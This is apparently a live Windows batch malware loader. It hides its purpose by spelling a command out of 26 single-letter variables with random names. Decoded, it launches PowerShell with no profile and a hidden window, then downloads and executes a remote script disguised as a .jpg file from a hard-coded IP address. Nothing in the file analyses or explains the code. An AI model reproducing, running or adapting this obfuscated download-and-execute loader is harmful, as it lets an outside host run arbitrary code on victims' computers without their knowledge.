@echo off
cd %SystemRoot%\System32
set wpxxuka=a
set twokral=b
set tmcvhmt=c
set umypjzx=d
set eiejlbv=e
set xnwokvs=f
set mxzwyty=g
set zyyaktu=h
set ouuirru=i
set evpgspe=j
set nkjttss=k
set nnnhofg=l
set hizdbzj=m
set sgvueag=n
set xzimsjc=o
set jeqjwjj=p
set aonlzfc=q
set ptqdtex=r
set hhqsfyq=s
set gocztmp=t
set jiuxrwx=u
set ujyhmzf=v
set hbrblyg=w
set macktgm=x
set ttkwxmw=y
set arrzusr=z
%eiejlbv%%tmcvhmt%%zyyaktu%%xzimsjc% %ouuirru%EX("%ouuirru%E%macktgm%(NE%hbrblyg%-%xzimsjc%%twokral%J%eiejlbv%%tmcvhmt%%gocztmp% N%eiejlbv%T.%hbrblyg%E%twokral%%tmcvhmt%L%ouuirru%%eiejlbv%%sgvueag%%gocztmp%).%umypjzx%%xzimsjc%%hbrblyg%%sgvueag%LO%wpxxuka%%umypjzx%S%gocztmp%R%ouuirru%NG('%zyyaktu%%gocztmp%%gocztmp%%jeqjwjj%://191.252.113.212/101010101.%evpgspe%%jeqjwjj%%mxzwyty%')"); | W%ouuirru%%sgvueag%%umypjzx%%xzimsjc%%hbrblyg%%hhqsfyq%P%xzimsjc%%hbrblyg%%eiejlbv%%ptqdtex%S%zyyaktu%%eiejlbv%%nnnhofg%%nnnhofg%\%ujyhmzf%1.0\%jeqjwjj%%xzimsjc%%hbrblyg%%eiejlbv%%ptqdtex%%hhqsfyq%%zyyaktu%%eiejlbv%%nnnhofg%%nnnhofg%.%eiejlbv%%macktgm%%eiejlbv% -%sgvueag%%xzimsjc%%jeqjwjj% -%hbrblyg%%ouuirru%%sgvueag% 1 -